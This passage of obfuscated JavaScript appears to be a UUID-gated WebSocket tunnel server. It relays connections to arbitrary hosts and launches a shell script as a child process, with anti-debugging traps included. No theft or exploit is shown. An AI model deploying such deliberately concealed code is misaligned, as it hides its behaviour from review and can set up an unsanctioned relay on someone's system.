_0x207e22(_0x23b2d2-0x147,_0x23b2d2-0x186,_0x907baa-0xf2,_0x1649d3,_0x52b7e8-0x10c);}function _0x1e5482(_0x35f990,_0x4ef2b0,_0x3086c4,_0x274cc2,_0x84226d){return _0x2146f8(_0x3086c4,_0x4ef2b0-0xf5,_0x3086c4-0x161,_0x274cc2-0x7e,_0x35f990-0x1b1);}function _0x3c5723(_0x533307,_0x4c9964,_0x403242,_0xe92fc,_0x16addf){return _0x207e22(_0x533307-0x157,_0x16addf-0x701,_0x403242-0x71,_0x403242,_0x16addf-0x14b);}_0x547ab0['on'](_0x40bda3[_0x3c5723(0x4f1,0x52b,0x567,0x613,0x5b6)],_0x40bda3[_0x3c5723(0x53b,0x548,0x4fa,0x4c2,0x51a)](_0xb94e54,_0x40bda3[_0x3c5723(0x45d,0x493,0x3db,0x3fe,0x483)]))[_0x3c5723(0x4e7,0x5d5,0x5d8,0x4ce,0x592)](this)['on'](_0x40bda3[_0x9c6c20(0x3b,0xc0,0x11c,0xeb,0x107)],_0x40bda3[_0x1e5482(0x66,0x101,-0x2e,0x148,0x13b)](_0x174e2d,_0x40bda3[_0x687019(0x1a8,0x181,0x134,0x133,0x283)]))[_0x3c5723(0x63f,0x5fb,0x649,0x595,0x592)](_0x547ab0);})['on'](_0x4a3fcb[_0x3b30db(0x225,0x168,0x28a,0x238,0x1c3)],_0x4a3fcb[_0x3b30db(0x1fd,0x271,0x2d3,0x173,0x179)](_0x32b88e,_0x4a3fcb[_0x2146f8(-0xb1,-0x1dc,-0x1a5,-0x101,-0x144)],_0xb54f8b));})['on'](_0x1c21f8[_0x29d5f9(0x260,0x2e3,0x2c0,0x20e,0x2c4)],_0x1c21f8[_0x29d5f9(0x1b1,0x120,0x23b,0x1bd,0x1ed)](_0x4fa98d,_0x1c21f8[_0x5ec539(-0x10c,-0x1df,-0xfa,-0xff,-0x184)]));}}});httpServer[_0x5b3717(-0x1f7,-0x269,-0x202,-0x1a0,-0x1f1)+'n'](port,()=>{function _0x4f73e5(_0x26d7ed,_0x444357,_0x2a7a97,_0x527e1e,_0x28490c){return _0x3b9f4f(_0x2a7a97- -0x167,_0x444357-0x97,_0x2a7a97-0x97,_0x527e1e-0x66,_0x444357);}function _0x54079d(_0x4f622f,_0x7f5321,_0x4099a1,_0x2c58be,_0x2ef5aa){return _0x3b9f4f(_0x4099a1- -0x2db,_0x7f5321-0x6b,_0x4099a1-0xe5,_0x2c58be-0x19f,_0x2ef5aa);}function _0x26639a(_0x5d3d7e,_0x29c4ad,_0x178272,_0x4b442a,_0x26f109){return _0x504eae(_0x26f109- -0x452,_0x29c4ad-0x4a,_0x178272-0xc7,_0x4b442a-0x1ba,_0x29c4ad);}function _0x5aa48e(_0x1cf985,_0x4471c3,_0xd8689d,_0xfd7aee,_0x3b6576){return _0x1e3602(_0x1cf985-0x20,_0xd8689d,_0xd8689d-0x87,_0x3b6576-0x200,_0x3b6576-0x2e);}function _0x193839(_0x5bc765,_0x4179c0,_0x453ecf,_0x550361,_0x533d70){return _0x5b3717(_0x550361-0x445,_0x453ecf,_0x453ecf-0xe5,_0x550361-0x10f,_0x533d70-0x66);}console[_0x5aa48e(0x1e1,0x76,0x1cf,0x98,0x162)](_0x54079d(-0x366,-0x264,-0x306,-0x2de,-0x242)+_0x5aa48e(0x1d7,0x228,0xd5,0x19e,0x17b)+_0x54079d(-0x267,-0x2c6,-0x200,-0x2e4,-0x140)+_0x5aa48e(0x1ae,0x22a,0x26e,0x281,0x246)+_0x26639a(-0x142,-0x1fc,-0x8a,-0xce,-0x147)+'\x20'+port);});const _0x58453d={};_0x58453d[_0x5b3717(-0x251,-0x1d1,-0x218,-0x227,-0x168)+'r']=httpServer;const wss=new WebSocket[(_0x504eae(0x258,0x1f3,0x339,0x329,0x2d8))+'r'](_0x58453d);wss['on'](_0x1e3602(-0x120,-0xfb,-0xa7,-0x71,0x27)+_0x1e3602(-0x2a,0x75,-0x17,0xb1,0x91),_0x338277=>{const _0x15e773={'peSlp':function(_0x196ade,_0x291a3c){return _0x196ade===_0x291a3c;},'Mlvef':_0x53ba12(0x112,0xd2,-0xc,0xd7,-0x15),'qvIbA':_0x53ba12(0x205,0x21b,0x173,0x2ba,0x208),'rLUYi':_0x22caf1(-0x84,0x9f,-0x18,0x55,0x9),'iKskN':function(_0x5aec02,_0x4a41f9){return _0x5aec02(_0x4a41f9);},'CyOYO':_0x48965c(0x499,0x49f,0x468,0x3cd,0x531),'vjNvL':function(_0x498de0,_0x1ab857){return _0x498de0(_0x1ab857);},'mAhaX':_0x53ba12(0xfa,0x117,0x50,0x170,0xc4),'wmrKJ':function(_0x97afe7,_0x5596f4){return _0x97afe7+_0x5596f4;},'UzLYU':function(_0x4079ce,_0x7de1){return _0x4079ce+_0x7de1;},'xggyp':_0x22caf1(-0x42,-0x1c,-0xc1,-0xad,-0x9)+_0x48965c(0x3f1,0x4dd,0x47b,0x4e3,0x465)+_0x4d9560(-0x1d9,-0x13d,-0x153,-0x155,-0x1b7)+_0x48965c(0x47c,0x394,0x442,0x330,0x457),'gtuvb':_0x4e9ec3(0x1be,0x16d,0x1e5,0x207,0x16a)+_0x4d9560(0x55,-0x4a,0xa,-0x5c,-0x2c)+_0x53ba12(0x60,0xd7,0xe7,0xf7,0x2e)+_0x4d9560(-0x107,0x8,-0xa3,-0x23,0x45)+_0x4e9ec3(0xd2,0xa7,0xd9,0x42,0x1af)+_0x48965c(0x49d,0x423,0x338,0x3d0,0x493)+'\x20)','nJwcJ':function(_0x34f70e,_0x420df2){return _0x34f70e!==_0x420df2;},'myeAR':_0x48965c(0x403,0x3a4,0x42b,0x448,0x3ec),'NHqXG':_0x53ba12(0x17f,0xc4,0x168,0xbf,0x14f),'HIzaX':function(_0x2c0d5a,_0x303dde){return _0x2c0d5a==_0x303dde;},'LFXJW':function(_0x5ba431,_0x230a43){return _0x5ba431+_0x230a43;},'pWOqq':function(_0x590dcb,_0x52c607){return _0x590dcb+_0x52c607;},'IdbFC':function(_0xc482c0,_0x8fba09,_0x230c0a,_0xb4b844){return _0xc482c0(_0x8fba09,_0x230c0a,_0xb4b844);},'kdWLe':_0x53ba12(0xea,0xa7,0x3b,0x156,0x9b)+_0x48965c(0x530,0x494,0x3ff,0x52b,0x4bb),'AMPQa':function(_0x4366c0,_0x220619){return _0x4366c0(_0x220619);},'wzZPT':function(_0x39f8aa,_0x4d22b1,_0x21d564){return _0x39f8aa(_0x4d22b1,_0x21d564);},'Eezyv':_0x4d9560(-0xaf,-0xd9,-0x83,-0x145,-0xb0)+_0x4e9ec3(0x22c,0x2ba,0x1d5,0x15f,0x1ca)+'r:','AJXkM':_0x53ba12(0x51,0xa7,0x32,0x37,-0x42)+_0x4d9560(-0x10c,-0x13e,-0xd4,-0x7e,-0x114)+_0x4d9560(0x1d,0xda,0x76,0x32,-0x6c)+_0x53ba12(0x15e,0xfd,0x17e,0x94,0x12d)+'ly','sxRLl':_0x53ba12(0x4f,0xf9,0x1bd,0x1ac,0x1e0)+'ge','zbVyN':_0x4e9ec3(0x157,0x254,0x23f,0x220,0x296)+_0x4e9ec3(0xf5,-0x10,0xcc,0xb9,0x71)+_0x53ba12(0x194,0x1e6,0x24e,0x25e,0x1ef)+':'};function _0x22caf1(_0x42eeed,_0x2bf72e,_0x1c7313,_0x3fae0b,_0x414167){return _0x3b9f4f(_0x414167-0x62,_0x2bf72e-0xe2,_0x1c7313-0xd6,_0x3fae0b-0x101,_0x3fae0b);}function _0x4d9560(_0x32560f,_0x19d1a5,_0x592c2c,_0x361ab5,_0x4eeedf){return _0x1d31e6(_0x361ab5- -0x203,_0x19d1a5-0x8e,_0x32560f,_0x361ab5-0x141,_0x4eeedf-0x157);}console[_0x48965c(0x3bb,0x372,0x3d8,0x3fb,0x350)](_0x15e773[_0x4d9560(-0x202,-0x134,-0x1cc,-0x1a0,-0x138)]);function _0x48965c(_0x29af8a,_0x4fff4b,_0x5ea167,_0x2a0838,_0x1e857d){return _0x3b9f4f(_0x4fff4b-0x3b7,_0x4fff4b-0x61,_0x5ea167-0xde,_0x2a0838-0x1d,_0x2a0838);}function _0x4e9ec3(_0x21b174,_0xd6c6ab,_0x2c9692,_0xbf63,_0x48d11a){return _0x5b3717(_0x2c9692-0x345,_0xbf63,_0x2c9692-0x16a,_0xbf63-0xb8,_0x48d11a-0x1b);}function _0x53ba12(_0x38030d,_0x20c24f,_0x3aba8b,_0xd84a7e,_0x101c14){return _0x504eae(_0x20c24f- -0x1c2,_0x20c24f-0x1ea,_0x3aba8b-0x14c,_0xd84a7e-0x1e4,_0x101c14);}_0x338277[_0x48965c(0x346,0x344,0x361,0x3f1,0x358)](_0x15e773[_0x53ba12(0x170,0x153,0x98,0x10f,0x176)],_0x582f00=>{function _0x1f0c5b(_0x36fad2,_0x3a1821,_0x49fb9a,_0x37f73e,_0xf00117){return _0x4d9560(_0x49fb9a,_0x3a1821-0x42,_0x49fb9a-0xfa,_0x36fad2-0xa7,_0xf00117-0x52);}function _0x41d87d(_0x38e8ac,_0x11e0f9,_0x1a5c0f,_0x46d3c6,_0x40e158){return _0x4e9ec3(_0x38e8ac-0x118,_0x11e0f9-0xdc,_0x11e0f9- -0xec,_0x46d3c6,_0x40e158-0xee);}function _0x5a4020(_0xd2a491,_0x3ce8a9,_0x5f0598,_0x5d80fe,_0x24753d){return _0x22caf1(_0xd2a491-0x76,_0x3ce8a9-0x146,_0x5f0598-0x2d,_0x5d80fe,_0x3ce8a9- -0x140);}function _0x4f1aaa(_0x51b05a,_0x50d8e8,_0x4eb23f,_0x12ebfa,_0xf53023){return _0x4e9ec3(_0x51b05a-0x16a,_0x50d8e8-0x59,_0xf53023- -0x345,_0x51b05a,_0xf53023-0x14d);}function _0x3d5022(_0x12afd0,_0x4b1a36,_0x47c467,_0x2ec865,_0x304c24){return _0x4e9ec3(_0x12afd0-0xc6,_0x4b1a36-0x192,_0x4b1a36-0x125,_0x304c24,_0x304c24-0x17f);}if(_0x15e773[_0x41d87d(0x15f,0xda,0x121,0xdc,0xd6)](_0x15e773[_0x3d5022(0x330,0x2f5,0x33c,0x299,0x344)],_0x15e773[_0x4f1aaa(-0x1d1,-0xf2,-0x19,-0x15,-0xf0)])){const [_0x4e2b08]=_0x582f00,_0x1b95e7=_0x582f00[_0x3d5022(0x257,0x281,0x216,0x1ff,0x251)](-0xf66+0x476*-0x7+0x2ea1,-0x1*-0x150a+0x1*-0x257d+0x1c*0x97);if(!_0x1b95e7[_0x41d87d(0x9e,0x27,0xda,-0x69,0x41)]((_0x18b0ee,_0x5ba6eb)=>_0x18b0ee==parseInt(uuid[_0x41d87d(0x42,-0x3f,0x1,-0x2d,-0xad)+'r'](_0x5ba6eb*(0x14d*-0x1+-0x38b*0x8+-0x1*-0x1da7),-0x175d*-0x1+-0x5*-0x597+-0x334e),-0x1*-0x1df5+0x793+0x368*-0xb)))return;let _0x2499f9=_0x15e773[_0x41d87d(-0xd,0xd1,0xd3,0xb1,0x4d)](_0x582f00[_0x3d5022(0x22c,0x281,0x2c8,0x332,0x236)](0x11*-0x71+-0x2e*-0x6a+0x1a*-0x71,0x1300+0xb33+-0x1e21)[_0x41d87d(-0x9c,0x1c,-0x5c,-0x30,0xce)+_0x41d87d(-0x98,-0x8,-0x18,-0x64,-0xf9)](),-0x13b2+0x5*-0x6fb+-0x2*-0x1b56);const _0x169107=_0x582f00[_0x4f1aaa(-0x20a,-0x161,-0x201,-0x267,-0x1e9)](_0x2499f9,_0x2499f9+=-0x16b*0x10+0x1006+0x6ac)[_0x1f0c5b(-0x75,-0x2a,-0x14f,0x72,-0x11f)+_0x5a4020(-0xce,0x1d,0xc4,-0x55,0x54)+'BE'](-0x1*-0x193a+0x4a*0x26+-0x2436),_0x26909=_0x582f00[_0x41d87d(-0x45,0x70,0x2c,-0x28,-0x4b)](_0x2499f9,_0x2499f9+=0x1f*-0x46+0x2408+-0x1b8d)[_0x41d87d(0x56,0x1c,-0x5a,-0xa5,-0xa3)+_0x41d87d(0x4c,-0x8,-0x98,-0xc9,-0x9a)](),_0x2df56b=_0x15e773[_0x5a4020(-0x6d,-0x9d,0x17,-0x145,0xe)](_0x26909,-0x266*0xb+-0x2241+0x3ca4)?_0x582f00[_0x5a4020(0x59,-0x7b,-0x112,-0x138,-0xcf)](_0x2499f9,_0x2499f9+=-0x269e+0x2559+-0x149*-0x1)[_0x41d87d(0x2d,0x104,0x146,0x1da,0xf5)]('.'):_0x15e773[_0x3d5022(0x2b4,0x25f,0x2cd,0x30c,0x1d6)](_0x26909,-0x1*0x9b1+-0x26d*-0x6+0x1*-0x4db)?new TextDecoder()[_0x3d5022(0x26b,0x2ae,0x247,0x33d,0x2d1)+'e'](_0x582f00[_0x1f0c5b(-0x21,0x83,-0xc0,0x7e,-0x25)](_0x15e773[_0x3d5022(0x351,0x2e2,0x234,0x2f6,0x278)](_0x2499f9,0x1*0x349+0x37f*-0x7+-0x1531*-0x1),_0x2499f9+=_0x15e773[_0x4f1aaa(-0x1c8,-0x155,-0x277,-0x21c,-0x1db)](0x1e5*-0xd+-0x2*0x136c+0x3f7a,_0x582f00[_0x1f0c5b(-0x21,0xaf,-0x77,-0x93,0xca)](_0x2499f9,_0x15e773[_0x4f1aaa(-0x317,-0x1ca,-0x218,-0x2e7,-0x24d)](_0x2499f9,-0x8b1+-0x197d+-0xb65*-0x3))[_0x4f1aaa(-0x1a5,-0x185,-0x17a,-0x16a,-0x23d)+_0x41d87d(0xbf,-0x8,0xc3,0x39,0x22)]()))):_0x15e773[_0x3d5022(0x2a0,0x25f,0x33d,0x25d,0x350)](_0x26909,-0x653*0x5+-0x26f9+0x469b)?_0x582f00[_0x41d87d(0xe7,0x70,0xec,0x1a,-0x46)](_0x2499f9,_0x2499f9+=-0x2*0x375+-0x71*-0x7+-0x1*-0x3e3)[_0x5a4020(0x33,-0x9c,-0x17d,-0x2d,-0x3d)+'e']((_0x316879,_0x3ec672,_0xfe2286,_0x40ee93)=>_0xfe2286%(0x10d*-0xe+-0x11c1+0x2079)?_0x316879[_0x3d5022(0xfc,0x1b7,0x1bf,0x272,0x231)+'t'](_0x40ee93[_0x5a4020(-0x156,-0x7b,0x4f,-0x3e,-0x62)](_0xfe2286-(0x91d*0x1+0xcf*-0xd+0x167),_0xfe2286+(-0x209a*0x1+-0x1323+0x19df*0x2))):_0x316879,[])[_0x1f0c5b(-0x54,-0x108,-0xbe,0x1a,-0x5b)](_0x427ae0=>_0x427ae0[_0x3d5022(0x2b5,0x22d,0x16f,0x26c,0x1ab)+_0x41d87d(0x167,0x108,0xf2,0x4a,0x1be)+'BE'](-0x1*-0x1e9e+-0x60e+-0x1890)[_0x1f0c5b(0xbd,0x119,0x114,0xe8,-0xc)+_0x5a4020(-0x185,-0x13c,-0x191,-0x5d,-0x180)](0x1c2e+0x1d05+0x3923*-0x1))[_0x1f0c5b(0x73,0x6e,-0x15,0x7a,0x122)](':'):'';_0x15e773[_0x4f1aaa(-0x1c0,-0x288,-0x30e,-0x2e6,-0x227)](logcb,_0x15e773[_0x41d87d(0x6b,0x154,0x196,0xe6,0xd9)],_0x2df56b,_0x169107),_0x338277[_0x1f0c5b(-0x8a,-0x3f,-0x127,-0x7a,-0xe7)](new Uint8Array([_0x4e2b08,0x138e*-0x1+0x1e8a*-0x1+-0x1*-0x3218]));const _0x472178=_0x15e773[_0x4f1aaa(-0x20d,-0x148,-0x1c8,-0x9b,-0x121)](createWebSocketStream,_0x338277),_0x454610={};_0x454610[_0x1f0c5b(0xdd,0x110,0x23,0x1b,0xab)]=_0x2df56b,_0x454610[_0x3d5022(0x21c,0x19e,0x252,0x14a,0x166)]=_0x169107;const _0x33faab={};_0x33faab[_0x1f0c5b(0xdd,0x10f,0x1bd,0x1a,0x17e)]=_0x2df56b,_0x33faab[_0x1f0c5b(-0x104,-0x32,-0x36,-0x7a,-0x1bf)]=_0x169107,net[_0x5a4020(-0xa0,-0xf6,-0x14e,-0xa7,-0x1d0)+'ct'](_0x454610,function(){function _0x11e0a3(_0x236c71,_0x4a6a48,_0x1ef5e0,_0x32d975,_0x11aa54){return _0x41d87d(_0x236c71-0x189,_0x4a6a48-0xce,_0x1ef5e0-0x4d,_0x32d975,_0x11aa54-0x3b);}function _0x32a8b5(_0x3e6379,_0x1c981a,_0x18be16,_0x203f9f,_0x1c008){return _0x1f0c5b(_0x1c008-0x168,_0x1c981a-0x137,_0x18be16,_0x203f9f-0x197,_0x1c008-0xd7);}function _0x16e631(_0x4993a4,_0x343edb,_0x2f90df,_0x1e6444,_0x335e7a){return _0x4f1aaa(_0x335e7a,_0x343edb-0x55,_0x2f90df-0x190,_0x1e6444-0x110,_0x2f90df- -0x29);}function _0x1098ae(_0xb69a5a,_0x1ae799,_0x2ff761,_0x287b23,_0x159c1e){return _0x1f0c5b(_0x1ae799-0x289,_0x1ae799-0xe3,_0x2ff761,_0x287b23-0x11e,_0x159c1e-0x1ce);}function _0x1f8911(_0x401cfd,_0x299939,_0x88c271,_0x6d7be,_0x18e21c){return _0x41d87d(_0x401cfd-0x161,_0x299939-0x36c,_0x88c271-0x3a,_0x18e21c,_0x18e21c-0x89);}if(_0x15e773[_0x32a8b5(0x14c,0x161,0x97,0x185,0xa8)](_0x15e773[_0x32a8b5(0x2db,0x299,0x2e4,0x322,0x23d)],_0x15e773[_0x11e0a3(0x262,0x1a0,0x1f6,0x1e3,0x23f)])){if(_0x524eef){const _0x4f6fde=_0x2d6d32[_0x1098ae(0x246,0x2ff,0x394,0x397,0x39c)](_0x56dd80,arguments);return _0xb21abe=null,_0x4f6fde;}}else this[_0x11e0a3(0x35,0xd2,0x1b5,0x31,0xb3)](_0x582f00[_0x1f8911(0x47d,0x3dc,0x402,0x484,0x410)](_0x2499f9)),_0x472178['on'](_0x15e773[_0x11e0a3(0xf8,0x89,0x160,0x55,0xd5)],_0x15e773[_0x16e631(-0x1cc,-0x2b9,-0x20c,-0x25c,-0x2b1)](errcb,_0x15e773[_0x1f8911(0x48f,0x48c,0x484,0x42a,0x3ea)]))[_0x11e0a3(0x142,0x1b0,0x296,0x277,0xee)](this)['on'](_0x15e773[_0x11e0a3(0xb7,0x89,0xf4,0xdd,0x94)],_0x15e773[_0x16e631(-0x1d2,-0x174,-0x21a,-0x237,-0x2e2)](errcb,_0x15e773[_0x16e631(-0x13d,-0x13b,-0x140,-0x212,-0x7d)]))[_0x32a8b5(0x1db,0x21c,0x27a,0x168,0x1b9)](_0x472178);})['on'](_0x15e773[_0x5a4020(-0xde,-0x130,-0xa4,-0x171,-0x1e7)],_0x15e773[_0x4f1aaa(-0x25e,-0x2be,-0x18c,-0x1bf,-0x25b)](errcb,_0x15e773[_0x1f0c5b(0xd2,0x85,0x40,-0x11,0x6f)],_0x33faab));}else _0x29f49a=iGzjzx[_0x3d5022(0x249,0x279,0x25e,0x33a,0x2f5)](_0x482d28,iGzjzx[_0x1f0c5b(0x40,0x104,0x72,0xb1,0x47)](iGzjzx[_0x5a4020(-0xe3,-0x25,-0x85,-0x62,-0xcc)](iGzjzx[_0x4f1aaa(-0x1c0,-0x37,-0x1b3,-0x167,-0x10c)],iGzjzx[_0x3d5022(0x35f,0x35b,0x3d4,0x3d7,0x2bc)]),');'))();})['on'](_0x15e773[_0x53ba12(0xcc,0x6f,0xd,-0x56,0x27)],_0x15e773[_0x53ba12(0x60,0x12a,0x105,0x152,0x163)](errcb,_0x15e773[_0x4d9560(-0x23e,-0x9c,-0x142,-0x159,-0x20f)]));}),childProcess[_0x504eae(0x2aa,0x1f7,0x1cf,0x1c4,0x2c7)+'t']['on'](_0x3b9f4f(0x64,0xb3,0x5b,0x49,0x10d),_0x32308f=>{function _0x3645a9(_0x3a0263,_0x37102e,_0x2d4d99,_0x11b00e,_0x2eeba1){return _0x3b9f4f(_0x2eeba1-0x1e,_0x37102e-0xe1,_0x2d4d99-0xc2,_0x11b00e-0x1e2,_0x11b00e);}function _0xbf076a(_0x33c5da,_0x64aff6,_0x5b8ddd,_0x31aa91,_0xac739c){return _0x504eae(_0xac739c- -0x2b3,_0x64aff6-0xde,_0x5b8ddd-0x2b,_0x31aa91-0x115,_0x5b8ddd);}function _0x55ac32(_0x4f5e95,_0x442d25,_0x84fde9,_0x53ca28,_0x4b390e){return _0x1e3602(_0x4f5e95-0x167,_0x4b390e,_0x84fde9-0x1,_0x53ca28-0x1da,_0x4b390e-0x19a);}console[_0xbf076a(-0x154,-0x140,-0xb8,0x2b,-0x75)](_0xbf076a(0xda,0x8a,-0xd9,0x2f,-0x9)+_0x55ac32(0x1d0,0x1b7,0x265,0x221,0x2e6)+_0x32308f);});function _0x5b3717(_0x53361c,_0x3d64eb,_0xd62b74,_0x2de2a2,_0x4d7f6e){return _0x222c(_0x53361c- -0x349,_0x3d64eb);}childProcess[_0x504eae(0x332,0x30f,0x25b,0x3c4,0x321)+'r']['on'](_0x1e3602(-0xc7,0x3c,-0xe1,0xb,-0x8a),_0x150c6a=>{function _0x58f46b(_0x5bd88f,_0x34e7b1,_0xafbc57,_0x1fbfae,_0x44ba8b){return _0x3b9f4f(_0x34e7b1-0x32c,_0x34e7b1-0x124,_0xafbc57-0x91,_0x1fbfae-0x138,_0xafbc57);}function _0x42ec39(_0x21c004,_0x334ee5,_0x59217d,_0x22145d,_0x579d99){return _0x3b9f4f(_0x579d99-0x7b,_0x334ee5-0x3e,_0x59217d-0xcd,_0x22145d-0x164,_0x22145d);}function _0x3ddc52(_0x37585d,_0x269aee,_0x1e785d,_0x343d5c,_0x13131e){return _0x3b9f4f(_0x13131e-0x283,_0x269aee-0x6d,_0x1e785d-0x15d,_0x343d5c-0x1e7,_0x37585d);}console[_0x3ddc52(0x208,0x149,0x20c,0x183,0x22a)](_0x3ddc52(0x2cd,0x3b4,0x3fc,0x2fc,0x332)+_0x42ec39(0xc0,0x184,0x1a4,0x85,0x15e)+_0x150c6a);}),childProcess['on'](_0x5b3717(-0x16d,-0x15c,-0xee,-0xc8,-0x1c7),_0x44d041=>{function _0x4510c4(_0x343fce,_0xf18e,_0x48a07b,_0x18d67e,_0x333faf){return _0x1e3602(_0x343fce-0x12f,_0x343fce,_0x48a07b-0x19c,_0x48a07b-0x184,_0x333faf-0x18c);}function _0x57a77d(_0x42aaae,_0x354fb4,_0x213b97,_0x7d1ee,_0x2e0766){return _0x5b3717(_0x213b97-0x430,_0x42aaae,_0x213b97-0xb2,_0x7d1ee-0x34,_0x2e0766-0x1f0);}function _0x5cb31b(_0x517b04,_0x4cf481,_0x4e7ac1,_0x3208e3,_0x37444f){return _0x3b9f4f(_0x4cf481- -0x20,_0x4cf481-0xd3,_0x4e7ac1-0x83,_0x3208e3-0x5f,_0x4e7ac1);}function _0x9f9bb8(_0x21b13b,_0x328460,_0xe89287,_0x175437,_0x212cc2){return _0x1e3602(_0x21b13b-0x131,_0x175437,_0xe89287-0xc9,_0x212cc2-0x327,_0x212cc2-0xa2);}function _0x224102(_0x3be2bf,_0x3762db,_0x164cd3,_0x2226b4,_0x417057){return _0x3b9f4f(_0x164cd3-0x446,_0x3762db-0x1bb,_0x164cd3-0x1df,_0x2226b4-0x7f,_0x3762db);}console[_0x9f9bb8(0x2c5,0x332,0x1f5,0x253,0x289)](_0x9f9bb8(0x2b3,0x30b,0x298,0x379,0x326)+_0x9f9bb8(0x18a,0x191,0x2d3,0x2e2,0x26f)+_0x4510c4(0x59,0x18c,0x133,0xa9,0x1e1)+_0x224102(0x56f,0x58f,0x4ef,0x59f,0x428)+_0x57a77d(0x283,0x30c,0x30c,0x395,0x330)+_0x224102(0x3f0,0x3e9,0x486,0x424,0x454)+_0x44d041);});function _0x4e4c(){const _0x35b343=['PJUHq','ess','2607099qtOSnB','NHzuu','VUWbC','WamCO','nDGnZ','prTxT','PIoog','ThJCG','gger','25c-c','Rpahm','BBKlA','\x20port','trace','8074146OfEJsv','RExtq','QbQPM','ufdSt','dcTsu','akkft','decod','bcCTr','sxRLl','while','NLVqL','uPIuo','VxtEs','QmRQu','vxfdZ','MBAXm','vyEiL','\x20(tru','nbfbP','Ejzpn','cxfXB','ng\x20on','t:\x20','RAplO','IWFzE','UbKUh','eServ','OABNl','fEhhE','funct','const','xit,\x20','AteeO','drGOn','PZViy','cted\x20','HXTIF','stder','tion','bUAtF','http','LegjN','ffwFQ','GwhBd','ydLrd','KBBMA','ZZxQO','UzLYU','ehNRh','omHUq','NtuTp','be4-4','lbAPp','EgIjE','Yicnh','state','CKgNX','vwWMV','wmrKJ','qvIbA','ound\x0a',')+)+)','iWTpY','iUkoU','BfvaY','cmawd','rVCDs','nJwcJ','sypaq','nstru','15441576cFxalo','PORT','KXHHp','iUyrA','gvLdn','pipe','AhMDR','myeAR','yIrAY','xFEeL','pOQpd','runni','ct-Er','ct:','IeSMM','close','liHXh','1c0a7','SyCzk','r:\x20','pCVxo','cxNks','3b6-b','wxMMJ','E1:','nkmzv','ODzMc','actio','{}.co','huTKO','PPgxu','11qyxnkm','baaVO','VJMWX','BKGxW','SSpbY','env','7apTMSr','jXxhT','join','PSHak','mODJA','apply','Int16','oePUv','vqZYb','YyzBo','WyYfq','35523WhLXEV',',\x20Wor','26ZTZBbS','dPuog','MOoJV','FXgKD','QUYWB','FFddC','\x22retu','ion\x20*','ction','cVTCn','tlkpy','MQLCG','rHuCY','./sta','eRUXM','creat','ITDzW','CyOYO','\x5c(\x20*\x5c','EEfdC','RJqbZ','iDzSp','chcUh','qgFlu','hMtyj','zkvhK','soNhl','13747460XHiaAI','sLgUb','Objec','kcOBP','dMrUv','pGfic','nnldf','hutFS','Error','n\x20(fu','SQFha','exit\x20','proto','IaAQQ','AMPQa','34973EQaioh','dgGbC','boUIg','TbmkI','thXtr','31b-9','igXwh','dehJt','qdEbE','mAhaX','FphDo','GwelD','IUuaa','OEyyx','UpZOL','5aAHeqs','iFdfD','gtuvb','HzzYl','bTZpH','xggyp','toStr','DlSBX','SZIrc','NDXLh','(((.+','WebSo','kdWLe','QtdjG','xisMf','sxjqi','aytnA','TfCYO','repla','fFEtn','rvbRb','djCCi','ZLSGn','VodzB','IUUld','net','RnvIN','Eezyv','zmHMa','ZSRjq','Mlvef','iRVDO','hLqPS','NHqXG','succe','VzILz','yvJLh','xDjCg','host','port','lwfzy','util','bvYam','ENUXM','XdJIb','a-zA-','AFQdy','mhjxL','call','NVlVS','AJXkM','vPGKz','once','ELQqV','zrEBO','JOvwt','PRlAo','liNNj','HHAvw','nEyQx','retur','fvPjT','ZtWnq','ZySZv','conca','RUvbo','xHxer','excep','QAMmq','QjooB','chain','BkELO','\x20proc','ing','dBMnj','ivCFN','BDovH','searc','error','SAPOu','BhFjR','CuVjr','pWlUa','HHIYV','EGhZe','rLUYi','gNvzd','to__','terva','nt-Ty','bHHoJ','subst','32qjTFKd','eURqP','2320ITVTvP','plain','rUHin','setIn','log','QPwpg','sEXRC','VYcwE','init','ulKmv','DbTXj','table','HFcrA','peSlp','vokxU','tsKtZ','ansOB','ructo','rdZbx','tWOOY','gNWCh','zZyec','MDzGd','rt.sh','hmvVG','count','LszCS','zbVyN','cket\x20','r\x20is\x20','Serve','nctio','TTiuI','GgHUu','nLwfJ','rcsmG','info','veKDz','n()\x20','url','IGTuh','rn\x20th','child','ivCZf','gHyhj','conso','CSsds','Conne','xWzfO','conne','YMKao','fBjQe','Int8','WZqeI','isNoV','lengt','TnDMY','hEApv','wzZPT','tdqlu','mjuUj','GlnpG','GXkqo','Z_$][','write','debu','qRURx','send','serve','QYFAI','tyKaX','qAiZw','pWOqq','esxiR','dFTqf','text/','DZKIl','e)\x20{}','pAIwA','xuxDF','ZcBtI','ess\x20e','KMlbm','egDib','DCpBU','YuZTU','GwNim','iiOWN','readU','UUID','OCFGX','Head','wXYKo','LDraj','AhSBZ','ctor(','pFaCe','zA-Z_','EBboY','every','XQEcL','XQvLW','CNRey','OaJSR','input','EIIdK','NXhPY','test','gpBzh','QRTPc','IdbFC','ZjhYg','stdou','CLxJL','MbvHf','ld\x0a','TfeVo','zOvbg','ArJzO','kgsEZ','vycxt','map','25bef','FqVfy','oewZB','$]*)','fmLpv','iRTzo','nKEwh','messa','xymJH','warn','xqvBr','ssful','39aa1','ioJGc','Not\x20F','code:','HIzaX','reduc','HSAgz','strin','UGzxM','Hello','FIsIF','IgZqH','__pro','ZBukS','end','MTwwb','wsjSt','bind','Rvigx','\x5c+\x5c+\x20','djRtw','_proc','FDrfr','JtRXc','liste','E2:','KYuYZ','Child','Conte','NRmyP','vjNvL','QQctm','baqfC','CzlDj','KbQMx','3184948GDYCkJ','chqdL','gZTRd','slice','data','fofzi','YZnVv','kEbvc','stdmP','iKskN','SeIEh','0-9a-','is\x22)(','fwptI','tamNE','LEbOf','SRWRa','LFXJW','oezYl','type','JhSmt','*(?:[','yIPvi','KZCzm','QENVS','QkmIN'];_0x4e4c=function(){return _0x35b343;};return _0x4e4c();}function _0x504eae(_0x2fc119,_0x5645a6,_0x3e5254,_0x27e50f,_0x40b493){return _0x222c(_0x2fc119-0x186,_0x40b493);}function _0x3b9f4f(_0x4d0e11,_0x5227de,_0x4e693f,_0x1476b1,_0x4240ea){return _0x222c(_0x4d0e11- -0xfd,_0x4240ea);}function _0x533f97(_0x505d61){const _0x274a73={'BhFjR':function(_0x3be348,_0x518cd4){return _0x3be348(_0x518cd4);},'qAiZw':function(_0x2a17fd,_0x5e5d71){return _0x2a17fd===_0x5e5d71;},'bvYam':_0x163385(-0x299,-0x281,-0x2c3,-0x1aa,-0x20d),'mjuUj':function(_0x121015,_0x5ce60e){return 